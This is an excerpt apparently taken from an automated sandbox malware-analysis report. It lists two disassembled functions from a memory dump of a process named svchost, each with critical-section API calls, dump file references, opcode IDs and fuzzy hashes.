                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 649423EB
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64942412
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: 6c5c170412acd35b33d122e5247fcd1a708dcfef8aec11af2fc5c19ab33a7a5d
                                                                                              • Instruction ID: f967bd8da5c0fc703b858b5675a139c0871c693ac84ec2db33bbd0f9f2198421
                                                                                              • Opcode Fuzzy Hash: 6c5c170412acd35b33d122e5247fcd1a708dcfef8aec11af2fc5c19ab33a7a5d
                                                                                              • Instruction Fuzzy Hash: 69314B727946008BD704CF39D84038977A5F785FACF588221DE29CA398EB35C596CB51
                                                                                              Function 64942170 Relevance: 5.1, APIs: 4, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                                                                                              • EnterCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421E5
                                                                                              • LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                                                                                              • Instruction ID: 7a5ad15dbad42ca2a217f772ee4adc9c7e6a81657260e45da0a70067a48174a5
                                                                                              • Opcode Fuzzy Hash: f15036db10595685eebc1814736d955a65ba432477aa49132a02940adeb30443
                                                                                              • Instruction Fuzzy Hash: B8018F237582549EE716DB77EC00B5AA7A4B789FD8F448122EE0983B14EA38C1438B01